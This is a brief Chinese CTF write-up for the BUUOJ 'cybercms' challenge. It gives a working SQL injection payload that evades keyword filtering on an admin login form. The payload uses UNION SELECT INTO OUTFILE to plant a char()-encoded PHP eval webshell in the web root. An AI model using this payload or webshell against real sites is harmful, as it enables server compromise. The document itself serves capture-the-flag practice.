cybercms

cybercms

第一步还是先找后台,后台在admin/

/admin/login.php

尝试一波密码发现进不去,

试试admin'发现报错

然后发现有www.zip 备份文件。

对登录框进行了过滤,这边绕了蛮久就不一一写了,直接上payload

最终payload:
url:http://67fa4a9d-62c0-45c9-8233-005c57ec0a7d.node4.buuoj.cn/admin/login.php?action=ck_login
​
user=admin%27/**/union/**/selselectect/**/1,2,3,4,char(60,63,112,104,112,32,64,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,59,63,62)/**/into/**/outoutfilefile/**/'/var/www/html/shell1.php'#&password=1&code=&submit=true&submit.x=39&submit.y=34

创建一个一句话木马

为这个页面就成功了,访问该页面,成功写入。

 

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值